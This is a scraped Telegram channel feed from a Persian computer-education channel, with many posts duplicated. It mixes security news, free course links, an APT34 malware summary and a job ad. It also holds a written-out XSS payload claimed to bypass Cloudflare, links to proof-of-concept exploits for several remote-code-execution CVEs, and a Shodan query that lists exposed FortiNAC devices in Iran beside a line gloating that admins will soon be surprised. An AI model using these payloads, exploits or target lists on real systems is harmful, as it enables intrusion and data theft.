"Network Nightmare" Mindmap.
It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.
• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.
https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer
It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.
• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.
https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer
Cloudflare bypass & template injection to XSS in one shoot
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2023-23333 : SolarView Compact 6.00 - Remote Command Execution
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2022-39952
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
امنیت به تجهیزات شما نیست
https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
امنیت به تجهیزات شما نیست
https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer
www.shodan.io
Shodan Search
Search query: http.favicon.hash:945408572 country:IR
نشت جدید: اطلاعات بیش از 800 هزار کاربر #پونیشا هم اکنون در خطر افشای عمومی. این دادهها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، تلفن همراه و اطلاعات دیگری از کاربران را شامل میشود. پونیشا قبلا هم دچار نشت داده شده بود. بیشتر بخوانید: https://wiki.leakfa.com/ponisha-new-leak
کانال آموزش کامپیوتر
Engineer_Computer
کانال آموزش کامپیوتر
Engineer_Computer
CVE-2023-0669 : GoAnywhere MFT < 7.1.2 - pre-authentication command injection
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer
👍2
نشت جدید: دادههای بیش از 800 هزار کاربر "سایت فریلنسری ایرانی و کار آنلاین پونیشا" که بر روی یک Elasticsearch محافظت نشده قرار گرفته بود، هم اکنون در خطر افشای عمومی اطلاعات قرار گرفتهاند. این دادهها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، شماره تلفن همراه، شهر، کشور، نوع حساب، نوع پروفایل، تصویر پروفایل، تصویر روی جلد پروفایل، رزومه، موقعیت شغلی، سوابق تحصیلی، دانشگاه محل تحصیل، مهارت ها و اطلاعات دیگری از کاربران را شامل میشوند. اینسایت دوسال پیش و در حوالی این روزها نیز دچار نشت اطلاعات دیگری شده بود.
کانال آموزش کامپیوتر
Engineer_Computer
کانال آموزش کامپیوتر
Engineer_Computer
دانلود دوره HTML - CSS ( رایگان)
مدرس : میثم منصف
https://cafenode.ir/HTML-CSS/01.zip
https://cafenode.ir/HTML-CSS/02.zip
https://cafenode.ir/HTML-CSS/03.zip
https://cafenode.ir/HTML-CSS/04.zip
https://cafenode.ir/HTML-CSS/05.zip
https://cafenode.ir/HTML-CSS/06.zip
https://cafenode.ir/HTML-CSS/07.zip
https://cafenode.ir/HTML-CSS/08.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/HTML-CSS/01.zip
https://cafenode.ir/HTML-CSS/02.zip
https://cafenode.ir/HTML-CSS/03.zip
https://cafenode.ir/HTML-CSS/04.zip
https://cafenode.ir/HTML-CSS/05.zip
https://cafenode.ir/HTML-CSS/06.zip
https://cafenode.ir/HTML-CSS/07.zip
https://cafenode.ir/HTML-CSS/08.zip
کانال آموزش کامپیوتر
@Engineer_Computer
دانلود رایگان دوره JavaScript - jQuery - Ajax
مدرس : میثم منصف
https://cafenode.ir/JS/01.zip
https://cafenode.ir/JS/02.zip
https://cafenode.ir/JS/03.zip
https://cafenode.ir/JS/04.zip
https://cafenode.ir/JS/05.zip
https://cafenode.ir/JS/06.zip
https://cafenode.ir/JS/07.zip
https://cafenode.ir/JS/08.zip
https://cafenode.ir/JS/09.zip
https://cafenode.ir/JS/10.zip
https://cafenode.ir/JS/11.zip
https://cafenode.ir/JS/12.zip
https://cafenode.ir/JS/13.zip
https://cafenode.ir/JS/14.zip
https://cafenode.ir/JS/15.zip
https://cafenode.ir/JS/16.zip
https://cafenode.ir/JS/17.zip
https://cafenode.ir/JS/18.zip
https://cafenode.ir/JS/19.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/JS/01.zip
https://cafenode.ir/JS/02.zip
https://cafenode.ir/JS/03.zip
https://cafenode.ir/JS/04.zip
https://cafenode.ir/JS/05.zip
https://cafenode.ir/JS/06.zip
https://cafenode.ir/JS/07.zip
https://cafenode.ir/JS/08.zip
https://cafenode.ir/JS/09.zip
https://cafenode.ir/JS/10.zip
https://cafenode.ir/JS/11.zip
https://cafenode.ir/JS/12.zip
https://cafenode.ir/JS/13.zip
https://cafenode.ir/JS/14.zip
https://cafenode.ir/JS/15.zip
https://cafenode.ir/JS/16.zip
https://cafenode.ir/JS/17.zip
https://cafenode.ir/JS/18.zip
https://cafenode.ir/JS/19.zip
کانال آموزش کامپیوتر
@Engineer_Computer
👍1
دانلود دوره رایگان ساخت فروشگاه با PHP - MYSQL ( پارت اول )
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/01.zip
https://cafenode.ir/PHP-SHOP-Project/02.zip
https://cafenode.ir/PHP-SHOP-Project/03.zip
https://cafenode.ir/PHP-SHOP-Project/04.zip
https://cafenode.ir/PHP-SHOP-Project/05.zip
https://cafenode.ir/PHP-SHOP-Project/06.zip
https://cafenode.ir/PHP-SHOP-Project/07.zip
https://cafenode.ir/PHP-SHOP-Project/08.zip
https://cafenode.ir/PHP-SHOP-Project/09.zip
https://cafenode.ir/PHP-SHOP-Project/10.zip
https://cafenode.ir/PHP-SHOP-Project/11.zip
https://cafenode.ir/PHP-SHOP-Project/12.zip
https://cafenode.ir/PHP-SHOP-Project/13.zip
https://cafenode.ir/PHP-SHOP-Project/14.zip
https://cafenode.ir/PHP-SHOP-Project/15.zip
https://cafenode.ir/PHP-SHOP-Project/16.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/01.zip
https://cafenode.ir/PHP-SHOP-Project/02.zip
https://cafenode.ir/PHP-SHOP-Project/03.zip
https://cafenode.ir/PHP-SHOP-Project/04.zip
https://cafenode.ir/PHP-SHOP-Project/05.zip
https://cafenode.ir/PHP-SHOP-Project/06.zip
https://cafenode.ir/PHP-SHOP-Project/07.zip
https://cafenode.ir/PHP-SHOP-Project/08.zip
https://cafenode.ir/PHP-SHOP-Project/09.zip
https://cafenode.ir/PHP-SHOP-Project/10.zip
https://cafenode.ir/PHP-SHOP-Project/11.zip
https://cafenode.ir/PHP-SHOP-Project/12.zip
https://cafenode.ir/PHP-SHOP-Project/13.zip
https://cafenode.ir/PHP-SHOP-Project/14.zip
https://cafenode.ir/PHP-SHOP-Project/15.zip
https://cafenode.ir/PHP-SHOP-Project/16.zip
کانال آموزش کامپیوتر
@Engineer_Computer
👍2
دانلود دوره رایگان ساخت فروشگاه با PHP - MYSQL ( پارت دوم )
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/17.zip
https://cafenode.ir/PHP-SHOP-Project/18.zip
https://cafenode.ir/PHP-SHOP-Project/19.zip
https://cafenode.ir/PHP-SHOP-Project/20.zip
https://cafenode.ir/PHP-SHOP-Project/21.zip
https://cafenode.ir/PHP-SHOP-Project/22.zip
https://cafenode.ir/PHP-SHOP-Project/23.zip
https://cafenode.ir/PHP-SHOP-Project/24.zip
https://cafenode.ir/PHP-SHOP-Project/25.zip
https://cafenode.ir/PHP-SHOP-Project/26.zip
https://cafenode.ir/PHP-SHOP-Project/27.zip
https://cafenode.ir/PHP-SHOP-Project/28.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/17.zip
https://cafenode.ir/PHP-SHOP-Project/18.zip
https://cafenode.ir/PHP-SHOP-Project/19.zip
https://cafenode.ir/PHP-SHOP-Project/20.zip
https://cafenode.ir/PHP-SHOP-Project/21.zip
https://cafenode.ir/PHP-SHOP-Project/22.zip
https://cafenode.ir/PHP-SHOP-Project/23.zip
https://cafenode.ir/PHP-SHOP-Project/24.zip
https://cafenode.ir/PHP-SHOP-Project/25.zip
https://cafenode.ir/PHP-SHOP-Project/26.zip
https://cafenode.ir/PHP-SHOP-Project/27.zip
https://cafenode.ir/PHP-SHOP-Project/28.zip
کانال آموزش کامپیوتر
@Engineer_Computer
دانلود جلسه اول دوره رایگان تست نفوذ وب OWASP
( آموزش HTTP )
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
کانال آموزش کامپیوتر
@Engineer_Computer
( آموزش HTTP )
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
کانال آموزش کامپیوتر
@Engineer_Computer
#Saitama #Malware #APT34
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.
CVE-2022-39952 : Fortinet FortiNAC - Unauthenticated RCE
POC : https://github.com/horizon3ai/CVE-2022-39952
کانال آموزش کامپیوتر
Engineer_Computer
POC : https://github.com/horizon3ai/CVE-2022-39952
کانال آموزش کامپیوتر
Engineer_Computer
شرکت proxify در سوئد با امکان پرداخت دلاری خوب + دورکاری در حال جذب در حوزه های زیر هست :
- پایتون
- ویو جی اس
- DevOps
- Node.js
- Full Stack JavaScript
- Laravel
- React
- React Native
- wordpress
ما قبلا هم این شرکت رو برای پوزیشن پایتون معرفی کرده بودیم اما متوجه شدیم که در حوزه های مختلف برنامه نویسی در حال جذب است و طبق آگهی قبلی فیدبک های خوبی رو هم حتی داشتیم، پس تصمیم گرفتیم این پست رو ایجاد کنیم که به برنامه نویسان بیشتری کمک کنیم
معرفی شرکت :
صفحه این شرکت در لینکدین :
https://www.linkedin.com/company/proxify-se/
این آگهی احتمالا پرداخت با رمز ارز را هم پشتیبانی می کند
برخی از مزایای همکاری :
💻 100٪ کار از راه دور: از هر جایی
👌🏻 انعطاف پذیری بالا: توانایی تغییر یک پروژه به پروژه دیگر.
💵 رشد مالی: افزایش رقابتی حقوق مبتنی بر عملکرد.
🧘🏻♂️ آزادی: برنامه کاری بسیار منعطف.
🚀 رشد 360 درجه: فرصت هایی برای پیشرفت و رشد شخصی دارید .
لیست آگهی های این شرکت :
https://weworkremotely.com/company/proxify-ab
صفحه استخدام این شرکت :
https://career.proxify.io/
کانال آموزش کامپیوتر
Engineer_Computer
- پایتون
- ویو جی اس
- DevOps
- Node.js
- Full Stack JavaScript
- Laravel
- React
- React Native
- wordpress
ما قبلا هم این شرکت رو برای پوزیشن پایتون معرفی کرده بودیم اما متوجه شدیم که در حوزه های مختلف برنامه نویسی در حال جذب است و طبق آگهی قبلی فیدبک های خوبی رو هم حتی داشتیم، پس تصمیم گرفتیم این پست رو ایجاد کنیم که به برنامه نویسان بیشتری کمک کنیم
معرفی شرکت :
صفحه این شرکت در لینکدین :
https://www.linkedin.com/company/proxify-se/
این آگهی احتمالا پرداخت با رمز ارز را هم پشتیبانی می کند
برخی از مزایای همکاری :
💻 100٪ کار از راه دور: از هر جایی
👌🏻 انعطاف پذیری بالا: توانایی تغییر یک پروژه به پروژه دیگر.
💵 رشد مالی: افزایش رقابتی حقوق مبتنی بر عملکرد.
🧘🏻♂️ آزادی: برنامه کاری بسیار منعطف.
🚀 رشد 360 درجه: فرصت هایی برای پیشرفت و رشد شخصی دارید .
لیست آگهی های این شرکت :
https://weworkremotely.com/company/proxify-ab
صفحه استخدام این شرکت :
https://career.proxify.io/
کانال آموزش کامپیوتر
Engineer_Computer
We Work Remotely
Remote Job Opportunities at Proxify AB
About us: Talent has no borders. Proxify's mission is to connect top developers around the world with the opportunities they deserve. So, it d...
👍1